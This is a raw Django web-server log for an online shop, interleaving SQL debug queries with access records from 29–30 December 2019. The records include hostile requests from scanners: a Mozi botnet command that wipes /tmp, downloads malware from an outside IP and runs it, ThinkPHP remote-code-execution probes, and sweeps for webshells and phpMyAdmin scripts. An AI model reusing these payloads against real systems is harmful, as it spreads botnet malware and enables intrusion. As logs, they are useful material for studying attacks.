"shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-29 19:47:56,060 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-29 19:47:56,064 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-29 19:47:56,068 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-29 19:47:56,073 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-29 19:47:56,077 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [29/Dec/2019 19:47:56] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [29/Dec/2019 19:50:58] "GET / HTTP/1.0" 302 0 [29/Dec/2019 19:56:00] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [29/Dec/2019 19:57:46] "GET /robots.txt HTTP/1.0" 404 6341 Not Found: /User/User_Favorite.asp [29/Dec/2019 19:57:47] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=215 HTTP/1.0" 404 6422 Not Found: /xyzx/SendMail.asp [29/Dec/2019 19:57:49] "GET /xyzx/SendMail.asp?ArticleID=332 HTTP/1.0" 404 6376 [29/Dec/2019 20:05:03] "GET / HTTP/1.0" 302 0 [29/Dec/2019 20:10:06] "GET / HTTP/1.0" 302 0 [29/Dec/2019 20:15:08] "GET / HTTP/1.0" 302 0 [29/Dec/2019 20:23:48] "GET / HTTP/1.0" 302 0 [29/Dec/2019 20:24:20] "GET / HTTP/1.0" 302 0 [29/Dec/2019 20:25:08] "GET / HTTP/1.0" 302 0 [29/Dec/2019 20:34:18] "GET / HTTP/1.0" 302 0 [29/Dec/2019 20:39:21] "GET / HTTP/1.0" 302 0 [29/Dec/2019 20:44:24] "GET / HTTP/1.0" 302 0 [29/Dec/2019 20:49:27] "GET / HTTP/1.0" 302 0 [29/Dec/2019 20:54:30] "GET / HTTP/1.0" 302 0 [29/Dec/2019 20:59:33] "GET / HTTP/1.0" 302 0 [29/Dec/2019 21:05:03] "GET / HTTP/1.0" 302 0 [29/Dec/2019 21:10:05] "GET / HTTP/1.0" 302 0 [29/Dec/2019 21:15:08] "GET / HTTP/1.0" 302 0 [29/Dec/2019 21:20:11] "GET / HTTP/1.0" 302 0 [29/Dec/2019 21:25:13] "GET / HTTP/1.0" 302 0 [29/Dec/2019 21:30:16] "GET / HTTP/1.0" 302 0 [29/Dec/2019 21:33:40] "GET / HTTP/1.0" 302 0 [29/Dec/2019 21:35:19] "GET / HTTP/1.0" 302 0 [29/Dec/2019 21:40:22] "GET / HTTP/1.0" 302 0 [29/Dec/2019 21:43:42] "GET / HTTP/1.0" 302 0 [29/Dec/2019 21:45:25] "GET / HTTP/1.0" 302 0 [29/Dec/2019 21:50:28] "GET / HTTP/1.0" 302 0 [29/Dec/2019 21:55:30] "GET / HTTP/1.0" 302 0 [29/Dec/2019 22:02:08] "GET / HTTP/1.0" 302 0 [29/Dec/2019 22:06:02] "GET / HTTP/1.0" 302 0 [29/Dec/2019 22:10:04] "GET / HTTP/1.0" 302 0 [29/Dec/2019 22:15:07] "GET / HTTP/1.0" 302 0 [29/Dec/2019 22:21:03] "GET / HTTP/1.0" 302 0 [29/Dec/2019 22:26:06] "GET / HTTP/1.0" 302 0 [29/Dec/2019 22:27:40] "GET / HTTP/1.0" 302 0 [29/Dec/2019 22:31:09] "GET / HTTP/1.0" 302 0 [29/Dec/2019 22:32:16] "GET / HTTP/1.0" 302 0 [29/Dec/2019 22:36:11] "GET / HTTP/1.0" 302 0 [29/Dec/2019 22:37:25] "GET / HTTP/1.0" 302 0 [29/Dec/2019 22:42:28] "GET / HTTP/1.0" 302 0 [29/Dec/2019 22:43:26] "GET / HTTP/1.0" 302 0 [29/Dec/2019 22:48:28] "GET / HTTP/1.0" 302 0 [29/Dec/2019 22:53:31] "GET / HTTP/1.0" 302 0 [29/Dec/2019 22:56:34] "GET / HTTP/1.0" 302 0 [29/Dec/2019 22:58:34] "GET / HTTP/1.0" 302 0 [29/Dec/2019 23:05:01] "GET /whm-server-status HTTP/1.0" 301 0 [29/Dec/2019 23:05:02] "GET / HTTP/1.0" 302 0 [29/Dec/2019 23:10:05] "GET / HTTP/1.0" 302 0 [29/Dec/2019 23:15:08] "GET / HTTP/1.0" 302 0 [29/Dec/2019 23:20:11] "GET / HTTP/1.0" 302 0 [29/Dec/2019 23:25:14] "GET / HTTP/1.0" 302 0 [29/Dec/2019 23:30:16] "GET / HTTP/1.0" 302 0 [29/Dec/2019 23:35:19] "GET / HTTP/1.0" 302 0 [29/Dec/2019 23:40:22] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [29/Dec/2019 23:40:22] "GET /robots.txt HTTP/1.0" 404 6341 [29/Dec/2019 23:45:25] "GET / HTTP/1.0" 302 0 Not Found: /newslist.asp [29/Dec/2019 23:49:09] "GET /newslist.asp?type=4&id=1314 HTTP/1.0" 404 6366 Not Found: /aqgl/Comment.asp [29/Dec/2019 23:49:33] "GET /aqgl/Comment.asp?ArticleID=136 HTTP/1.0" 404 6373 Not Found: /aqgl/Comment.asp [29/Dec/2019 23:49:36] "GET /aqgl/Comment.asp?ArticleID=240 HTTP/1.0" 404 6373 Not Found: /xsyd/Comment.asp [29/Dec/2019 23:49:39] "GET /xsyd/Comment.asp?ArticleID=455 HTTP/1.0" 404 6373 Not Found: /xyzx/Comment.asp [29/Dec/2019 23:49:41] "GET /xyzx/Comment.asp?ArticleID=434 HTTP/1.0" 404 6373 [29/Dec/2019 23:50:28] "GET / HTTP/1.0" 302 0 Not Found: /User/User_Favorite.asp [29/Dec/2019 23:51:25] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1005&InfoID=352 HTTP/1.0" 404 6422 [29/Dec/2019 23:55:31] "GET / HTTP/1.0" 302 0 [30/Dec/2019 00:05:03] "GET / HTTP/1.0" 302 0 [30/Dec/2019 00:10:05] "GET / HTTP/1.0" 302 0 [30/Dec/2019 00:16:53] "GET / HTTP/1.0" 302 0 [30/Dec/2019 00:21:55] "GET / HTTP/1.0" 302 0 Not Found: /xyzx/ShowArticle.asp [30/Dec/2019 00:25:35] "GET /xyzx/ShowArticle.asp?ArticleID=326 HTTP/1.0" 404 6385 [30/Dec/2019 00:26:58] "GET / HTTP/1.0" 302 0 Not Found: /xyzx/UploadFiles_7376/201609/2016091212213292.jpg [30/Dec/2019 00:27:39] "GET /xyzx/UploadFiles_7376/201609/2016091212213292.jpg HTTP/1.0" 404 6458 [30/Dec/2019 00:32:01] "GET / HTTP/1.0" 302 0 Not Found: /newstwo.asp [30/Dec/2019 00:33:40] "GET /newstwo.asp?id=510000 HTTP/1.0" 404 6354 Not Found: /newslist.asp [30/Dec/2019 00:34:02] "GET /newslist.asp?type=2&id=20100 HTTP/1.0" 404 6367 Not Found: /aqgl/Print.asp [30/Dec/2019 00:34:19] "GET /aqgl/Print.asp?ArticleID=399 HTTP/1.0" 404 6367 Not Found: /aqgl/SendMail.asp [30/Dec/2019 00:34:20] "GET /aqgl/SendMail.asp?ArticleID=136 HTTP/1.0" 404 6376 Not Found: /dtgh/ShowArticle.asp [30/Dec/2019 00:34:21] "GET /dtgh/ShowArticle.asp?ArticleID=146 HTTP/1.0" 404 6385 Not Found: /jspd/SendMail.asp [30/Dec/2019 00:34:22] "GET /jspd/SendMail.asp?ArticleID=272 HTTP/1.0" 404 6376 Not Found: /xsyd/Print.asp [30/Dec/2019 00:34:23] "GET /xsyd/Print.asp?ArticleID=513 HTTP/1.0" 404 6367 Not Found: /xyzx/Comment.asp [30/Dec/2019 00:34:24] "GET /xyzx/Comment.asp?ArticleID=344 HTTP/1.0" 404 6373 Not Found: /xyzx/Print.asp [30/Dec/2019 00:34:26] "GET /xyzx/Print.asp?ArticleID=481 HTTP/1.0" 404 6367 Not Found: /xyzx/Comment.asp [30/Dec/2019 00:34:27] "GET /xyzx/Comment.asp?ArticleID=472 HTTP/1.0" 404 6373 Not Found: /xyzx/SendMail.asp [30/Dec/2019 00:34:28] "GET /xyzx/SendMail.asp?ArticleID=328 HTTP/1.0" 404 6376 Not Found: /bszs.conac.cn/sitename [30/Dec/2019 00:35:15] "GET /bszs.conac.cn/sitename?method=show&id=0D9923CEDC7F1FD0E053022819AC1512 HTTP/1.0" 404 6429 [30/Dec/2019 00:37:04] "GET / HTTP/1.0" 302 0 [30/Dec/2019 00:42:07] "GET / HTTP/1.0" 302 0 [30/Dec/2019 00:47:10] "GET / HTTP/1.0" 302 0 [30/Dec/2019 00:47:47] "GET / HTTP/1.0" 302 0 [30/Dec/2019 00:57:08] "GET / HTTP/1.0" 302 0 [30/Dec/2019 01:00:02] "GET /whm-server-status HTTP/1.0" 301 0 [30/Dec/2019 01:05:03] "GET / HTTP/1.0" 302 0 [30/Dec/2019 01:10:05] "GET / HTTP/1.0" 302 0 [30/Dec/2019 01:15:02] "GET / HTTP/1.0" 302 0 [30/Dec/2019 01:15:08] "GET / HTTP/1.0" 302 0 [30/Dec/2019 01:23:21] "GET / HTTP/1.0" 302 0 Not Found: /newslist.asp [30/Dec/2019 01:24:25] "GET /newslist.asp?type=4&id=1071 HTTP/1.0" 404 6366 Not Found: /newslist.asp [30/Dec/2019 01:24:28] "GET /newslist.asp?type=4&id=1330 HTTP/1.0" 404 6366 [30/Dec/2019 01:28:24] "GET / HTTP/1.0" 302 0 [30/Dec/2019 01:30:01] "GET /whm-server-status HTTP/1.0" 301 0 [30/Dec/2019 01:33:26] "GET / HTTP/1.0" 302 0 [30/Dec/2019 01:38:29] "GET / HTTP/1.0" 302 0 [30/Dec/2019 01:43:32] "GET / HTTP/1.0" 302 0 Not Found: /index.asp [30/Dec/2019 01:43:59] "GET /index.asp?T=copyRight&%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%CD%B7%EF%BF%BD%EF%BF%BD%EF%BF%BD%C5%B5%EF%BF%BD HTTP/1.0" 404 6439 [30/Dec/2019 01:48:34] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [30/Dec/2019 01:49:50] "GET /robots.txt HTTP/1.0" 404 6341 Not Found: /User/User_Favorite.asp [30/Dec/2019 01:49:52] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=216 HTTP/1.0" 404 6422 Not Found: /xyzx/SendMail.asp [30/Dec/2019 01:49:54] "GET /xyzx/SendMail.asp?ArticleID=333 HTTP/1.0" 404 6376 [30/Dec/2019 01:53:37] "GET / HTTP/1.0" 302 0 [30/Dec/2019 01:58:40] "GET / HTTP/1.0" 302 0 [30/Dec/2019 02:05:03] "GET / HTTP/1.0" 302 0 [30/Dec/2019 02:10:01] "GET /whm-server-status HTTP/1.0" 301 0 [30/Dec/2019 02:10:06] "GET / HTTP/1.0" 302 0 Not Found: /favicon.ico [30/Dec/2019 02:12:33] "GET /favicon.ico HTTP/1.0" 404 6344 [30/Dec/2019 02:16:55] "GET / HTTP/1.0" 302 0 [30/Dec/2019 02:21:57] "GET / HTTP/1.0" 302 0 Not Found: /jspd/UploadFiles_5886/201405/2014051912512716.doc [30/Dec/2019 02:25:26] "GET /jspd/UploadFiles_5886/201405/2014051912512716.doc HTTP/1.0" 404 6458 Not Found: /newslist.asp [30/Dec/2019 02:26:17] "GET /newslist.asp?type=1&id=70300 HTTP/1.0" 404 6367 Not Found: /bmxx/Print.asp [30/Dec/2019 02:26:24] "GET /bmxx/Print.asp?ArticleID=353 HTTP/1.0" 404 6367 Not Found: /xyzx/SendMail.asp [30/Dec/2019 02:26:27] "GET /xyzx/SendMail.asp?ArticleID=276 HTTP/1.0" 404 6376 [30/Dec/2019 02:27:00] "GET / HTTP/1.0" 302 0 Not Found: /User/User_Favorite.asp [30/Dec/2019 02:27:02] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=472 HTTP/1.0" 404 6422 [30/Dec/2019 02:36:24] "GET / HTTP/1.0" 302 0 [30/Dec/2019 02:36:59] "GET / HTTP/1.0" 302 0 [30/Dec/2019 02:42:06] "GET / HTTP/1.0" 302 0 [30/Dec/2019 02:47:08] "GET / HTTP/1.0" 302 0 [30/Dec/2019 02:52:11] "GET / HTTP/1.0" 302 0 [30/Dec/2019 02:57:14] "GET / HTTP/1.0" 302 0 [30/Dec/2019 03:05:03] "GET / HTTP/1.0" 302 0 [30/Dec/2019 03:07:26] "GET / HTTP/1.0" 302 0 Not Found: /xkdh/ShowClass.asp [30/Dec/2019 03:07:29] "GET /xkdh/ShowClass.asp?ClassID=53 HTTP/1.0" 404 6376 Not Found: /aqgl/ShowClass.asp [30/Dec/2019 03:07:50] "GET /aqgl/ShowClass.asp?ClassID=5 HTTP/1.0" 404 6375 Not Found: /newslist.asp [30/Dec/2019 03:08:36] "GET /newslist.asp?type=1&id=60500 HTTP/1.0" 404 6367 Not Found: /newslist.asp [30/Dec/2019 03:08:38] "GET /newslist.asp?type=4&id=1373 HTTP/1.0" 404 6366 Not Found: /dtgh/ShowArticle.asp [30/Dec/2019 03:08:43] "GET /dtgh/ShowArticle.asp?ArticleID=144 HTTP/1.0" 404 6385 [30/Dec/2019 03:10:05] "GET / HTTP/1.0" 302 0 [30/Dec/2019 03:15:08] "GET / HTTP/1.0" 302 0 [30/Dec/2019 03:20:10] "GET / HTTP/1.0" 302 0 [30/Dec/2019 03:25:13] "GET / HTTP/1.0" 302 0 [30/Dec/2019 03:28:30] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://221.210.211.2:43448/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.0" 301 0 [30/Dec/2019 03:30:16] "GET / HTTP/1.0" 302 0 [30/Dec/2019 03:35:19] "GET / HTTP/1.0" 302 0 [30/Dec/2019 03:40:22] "GET / HTTP/1.0" 302 0 [30/Dec/2019 03:45:25] "GET / HTTP/1.0" 302 0 Not Found: /newslist.asp [30/Dec/2019 03:49:56] "GET /newslist.asp?type=4&id=1198 HTTP/1.0" 404 6366 Not Found: /jspd/ShowArticle.asp [30/Dec/2019 03:50:01] "GET /jspd/ShowArticle.asp?ArticleID=73 HTTP/1.0" 404 6384 Not Found: /dtgh/ShowClass.asp [30/Dec/2019 03:50:21] "GET /dtgh/ShowClass.asp?ClassID=12 HTTP/1.0" 404 6376 [30/Dec/2019 03:50:27] "GET / HTTP/1.0" 302 0 [30/Dec/2019 03:55:30] "GET / HTTP/1.0" 302 0 [30/Dec/2019 04:05:02] "GET / HTTP/1.0" 302 0 [30/Dec/2019 04:10:05] "GET / HTTP/1.0" 302 0 [30/Dec/2019 04:11:45] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-30 04:11:45,163 utils 2749 140297222735616 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'yjk4cgqplqcnd9182ozvtdmq5n1btvpv' LIMIT 1; args=('yjk4cgqplqcnd9182ozvtdmq5n1btvpv',) DEBUG 2019-12-30 04:11:45,165 utils 2749 140297222735616 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('yjk4cgqplqcnd9182ozvtdmq5n1btvpv', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-13T04:11:45.164109+00:00'::timestamptz); args=('yjk4cgqplqcnd9182ozvtdmq5n1btvpv', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 13, 4, 11, 45, 164109, tzinfo=)) [30/Dec/2019 04:11:45] "GET /login/?next=/ HTTP/1.0" 200 1786 [30/Dec/2019 04:15:08] "GET / HTTP/1.0" 302 0 [30/Dec/2019 04:20:11] "GET / HTTP/1.0" 302 0 [30/Dec/2019 04:25:14] "GET / HTTP/1.0" 302 0 [30/Dec/2019 04:30:17] "GET / HTTP/1.0" 302 0 [30/Dec/2019 04:35:19] "GET / HTTP/1.0" 302 0 [30/Dec/2019 04:40:22] "GET / HTTP/1.0" 302 0 [30/Dec/2019 04:45:24] "GET / HTTP/1.0" 302 0 [30/Dec/2019 04:50:27] "GET / HTTP/1.0" 302 0 [30/Dec/2019 04:53:04] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-30 04:53:05,102 utils 2749 140297222735616 (0.002) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'voczrzrx9ijsfakv4o5knedgbu3xq64r' LIMIT 1; args=('voczrzrx9ijsfakv4o5knedgbu3xq64r',) DEBUG 2019-12-30 04:53:05,104 utils 2749 140297222735616 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('voczrzrx9ijsfakv4o5knedgbu3xq64r', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-13T04:53:05.103272+00:00'::timestamptz); args=('voczrzrx9ijsfakv4o5knedgbu3xq64r', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 13, 4, 53, 5, 103272, tzinfo=)) [30/Dec/2019 04:53:05] "GET /login/?next=/ HTTP/1.0" 200 1786 Not Found: /index.asp [30/Dec/2019 04:53:07] "GET /index.asp HTTP/1.0" 404 6338 [30/Dec/2019 04:55:29] "GET / HTTP/1.0" 302 0 [30/Dec/2019 05:04:59] "GET / HTTP/1.0" 302 0 [30/Dec/2019 05:10:10] "GET / HTTP/1.0" 302 0 [30/Dec/2019 05:15:13] "GET / HTTP/1.0" 302 0 [30/Dec/2019 05:20:16] "GET / HTTP/1.0" 302 0 [30/Dec/2019 05:25:19] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [30/Dec/2019 05:25:24] "GET /robots.txt HTTP/1.0" 404 6341 [30/Dec/2019 05:25:26] "GET / HTTP/1.0" 302 0 [30/Dec/2019 05:30:22] "GET / HTTP/1.0" 302 0 [30/Dec/2019 05:35:25] "GET / HTTP/1.0" 302 0 [30/Dec/2019 05:39:09] "GET / HTTP/1.0" 302 0 [30/Dec/2019 05:40:28] "GET / HTTP/1.0" 302 0 [30/Dec/2019 05:45:31] "GET / HTTP/1.0" 302 0 [30/Dec/2019 05:50:34] "GET / HTTP/1.0" 302 0 [30/Dec/2019 05:55:36] "GET / HTTP/1.0" 302 0 [30/Dec/2019 06:04:53] "GET / HTTP/1.0" 302 0 [30/Dec/2019 06:13:03] "GET / HTTP/1.0" 302 0 [30/Dec/2019 06:20:34] "GET / HTTP/1.0" 302 0 [30/Dec/2019 06:25:54] "GET / HTTP/1.0" 302 0 [30/Dec/2019 06:30:56] "GET / HTTP/1.0" 302 0 [30/Dec/2019 06:36:13] "GET / HTTP/1.0" 302 0 [30/Dec/2019 06:41:16] "GET / HTTP/1.0" 302 0 [30/Dec/2019 06:46:34] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [30/Dec/2019 06:47:47] "GET /robots.txt HTTP/1.0" 404 6341 Not Found: /dyzl/Print.asp [30/Dec/2019 06:47:52] "GET /dyzl/Print.asp?ArticleID=378 HTTP/1.0" 404 6367 Not Found: /xyzx/SendMail.asp [30/Dec/2019 06:48:05] "GET /xyzx/SendMail.asp?ArticleID=334 HTTP/1.0" 404 6376 [30/Dec/2019 06:53:36] "GET / HTTP/1.0" 302 0 [30/Dec/2019 07:00:01] "GET / HTTP/1.0" 302 0 [30/Dec/2019 07:02:38] "GET / HTTP/1.0" 302 0 [30/Dec/2019 07:05:03] "GET / HTTP/1.0" 302 0 [30/Dec/2019 07:13:36] "GET / HTTP/1.0" 302 0 [30/Dec/2019 07:22:36] "GET / HTTP/1.0" 302 0 [30/Dec/2019 07:27:55] "GET / HTTP/1.0" 302 0 [30/Dec/2019 07:32:57] "GET / HTTP/1.0" 302 0 [30/Dec/2019 07:38:15] "GET / HTTP/1.0" 302 0 [30/Dec/2019 07:43:18] "GET / HTTP/1.0" 302 0 [30/Dec/2019 07:48:36] "GET / HTTP/1.0" 302 0 [30/Dec/2019 07:53:38] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [30/Dec/2019 07:58:53] "GET /robots.txt HTTP/1.0" 404 6340 Not Found: /Adminb5512046/Login.php [30/Dec/2019 07:58:55] "POST /Adminb5512046/Login.php HTTP/1.0" 404 6380 [30/Dec/2019 07:58:56] "GET / HTTP/1.0" 302 0 [30/Dec/2019 07:58:58] "GET / HTTP/1.0" 302 0 Not Found: /l.php [30/Dec/2019 07:59:05] "GET /l.php HTTP/1.0" 404 6325 Not Found: /bbs/index.php [30/Dec/2019 07:59:47] "POST /bbs/index.php HTTP/1.0" 404 6350 Not Found: /forum/index.php [30/Dec/2019 07:59:47] "POST /forum/index.php HTTP/1.0" 404 6356 DEBUG 2019-12-30 07:59:57,911 utils 2749 140297222735616 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'webdav'; args=('webdav',) Not Found: /webdav/ [30/Dec/2019 07:59:57] "GET /webdav/ HTTP/1.0" 404 1728 Not Found: /help.php [30/Dec/2019 07:59:58] "GET /help.php HTTP/1.0" 404 6334 [30/Dec/2019 08:00:01] "GET /whm-server-status HTTP/1.0" 301 0 Not Found: /java.php [30/Dec/2019 08:00:02] "GET /java.php HTTP/1.0" 404 6334 Not Found: /db_cts.php [30/Dec/2019 08:00:14] "GET /db_cts.php HTTP/1.0" 404 6340 Not Found: /logon.php [30/Dec/2019 08:00:22] "GET /logon.php HTTP/1.0" 404 6337 Not Found: /license.php [30/Dec/2019 08:00:31] "GET /license.php HTTP/1.0" 404 6343 Not Found: /log.php [30/Dec/2019 08:00:33] "GET /log.php HTTP/1.0" 404 6331 Not Found: /hell.php [30/Dec/2019 08:00:34] "GET /hell.php HTTP/1.0" 404 6334 Not Found: /x.php [30/Dec/2019 08:00:38] "GET /x.php HTTP/1.0" 404 6325 Not Found: /shell.php [30/Dec/2019 08:00:39] "GET /shell.php HTTP/1.0" 404 6337 Not Found: /htdocs.php [30/Dec/2019 08:00:41] "GET /htdocs.php HTTP/1.0" 404 6340 Not Found: /sane.php [30/Dec/2019 08:00:46] "GET /sane.php HTTP/1.0" 404 6334 Not Found: /z.php [30/Dec/2019 08:00:54] "GET /z.php HTTP/1.0" 404 6325 Not Found: /lala.php [30/Dec/2019 08:00:58] "GET /lala.php HTTP/1.0" 404 6334 Not Found: /lala-dpr.php [30/Dec/2019 08:01:02] "GET /lala-dpr.php HTTP/1.0" 404 6346 Not Found: /wpc.php [30/Dec/2019 08:01:06] "GET /wpc.php HTTP/1.0" 404 6331 Not Found: /wpo.php [30/Dec/2019 08:01:07] "GET /wpo.php HTTP/1.0" 404 6331 Not Found: /t6nv.php [30/Dec/2019 08:01:10] "GET /t6nv.php HTTP/1.0" 404 6334 Not Found: /text.php [30/Dec/2019 08:01:18] "GET /text.php HTTP/1.0" 404 6334 Not Found: /muhstik.php [30/Dec/2019 08:01:21] "GET /muhstik.php HTTP/1.0" 404 6343 Not Found: /muhstiks.php [30/Dec/2019 08:01:25] "GET /muhstiks.php HTTP/1.0" 404 6346 Not Found: /lol.php [30/Dec/2019 08:01:42] "GET /lol.php HTTP/1.0" 404 6331 Not Found: /cmd.php [30/Dec/2019 08:01:49] "GET /cmd.php HTTP/1.0" 404 6331 Not Found: /cmdd.php [30/Dec/2019 08:01:53] "GET /cmdd.php HTTP/1.0" 404 6334 Not Found: /knal.php [30/Dec/2019 08:01:54] "GET /knal.php HTTP/1.0" 404 6334 Not Found: /shell.php [30/Dec/2019 08:01:57] "GET /shell.php HTTP/1.0" 404 6337 Not Found: /scripts/setup.php [30/Dec/2019 08:02:03] "GET /scripts/setup.php HTTP/1.0" 404 6361 Not Found: /scripts/db___.init.php [30/Dec/2019 08:02:09] "GET /scripts/db___.init.php HTTP/1.0" 404 6376 Not Found: /phpmyadmin/scripts/db___.init.php [30/Dec/2019 08:02:10] "GET /phpmyadmin/scripts/db___.init.php HTTP/1.0" 404 6409 Not Found: /phpMyAdmin/scripts/db___.init.php [30/Dec/2019 08:02:12] "GET /phpMyAdmin/scripts/db___.init.php HTTP/1.0" 404 6409 Not Found: /pma/scripts/setup.php [30/Dec/2019 08:02:13] "GET /pma/scripts/setup.php HTTP/1.0" 404 6373 Not Found: /PMA/scripts/setup.php [30/Dec/2019 08:02:17] "GET /PMA/scripts/setup.php HTTP/1.0" 404 6373 Not Found: /MyAdmin/scripts/setup.php [30/Dec/2019 08:02:23] "GET /MyAdmin/scripts/setup.php HTTP/1.0" 404 6385 Not Found: /weathermap/editor.php [30/Dec/2019 08:02:55] "GET /weathermap/editor.php HTTP/1.0" 404 6373 Not Found: /index.php [30/Dec/2019 08:02:56] "GET /index.php?s=%2f%69%6e%64%65%78%2f%5c%74%68%69%6e%6b%5c%61%70%70%2f%69%6e%76%6f%6b%65%66%75%6e%63%74%69%6f%6e&function=%63%61%6c%6c%5f%75%73%65%72%5f%66%75%6e%63%5f%61%72%72%61%79&vars[0]=%6d%645&vars[1][]=%48%65%6c%6c%6f%54%68%69%6e%6b%50%48%50 HTTP/1.0" 404 6584 Not Found: /elrekt.php [30/Dec/2019 08:03:02] "GET /elrekt.php?s=%2f%69%6e%64%65%78%2f%5c%74%68%69%6e%6b%5c%61%70%70%2f%69%6e%76%6f%6b%65%66%75%6e%63%74%69%6f%6e&function=%63%61%6c%6c%5f%75%73%65%72%5f%66%75%6e%63%5f%61%72%72%61%79&vars[0]=%6d%645&vars[1][]=%48%65%6c%6c%6f%54%68%69%6e%6b%50%48%50 HTTP/1.0" 404 6587 DEBUG 2019-12-30 08:03:02,855 utils 2749 140297222735616 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'App'; args=('App',) Not Found: /App/ [30/Dec/2019 08:03:02] "GET /App/?content=die(md5(HelloThinkPHP)) HTTP/1.0" 404 1754 Not Found: /index.php [30/Dec/2019 08:03:06] "GET /index.php?s=/module/action/param1/${@die(md5(HelloThinkPHP))} HTTP/1.0" 404 6393 [30/Dec/2019 08:03:21] "GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.0" 302 0 [30/Dec/2019 08:03:22] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-30 08:03:23,212 utils 2749 140297222735616 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'joomla'; args=('joomla',) Not Found: /joomla/ [30/Dec/2019 08:03:23] "GET /joomla/ HTTP/1.0" 404 1728 Not Found: /rxr.php [30/Dec/2019 08:03:45] "GET /rxr.php HTTP/1.0" 404 6331 Not Found: /undx.php [30/Dec/2019 08:03:53] "GET /undx.php HTTP/1.0" 404 6334 Not Found: /payload.php [30/Dec/2019 08:03:59] "GET /payload.php HTTP/1.0" 404 6343 Not Found: /composers.php [30/Dec/2019 08:04:03] "GET /composers.php HTTP/1.0" 404 6349 Not Found: /izom.php [30/Dec/2019 08:04:03] "GET /izom.php HTTP/1.0" 404 6334 Not Found: /hue2.php [30/Dec/2019 08:04:09] "GET /hue2.php HTTP/1.0" 404 6334 Not Found: /Drupal.php [30/Dec/2019 08:04:10] "GET /Drupal.php HTTP/1.0" 404 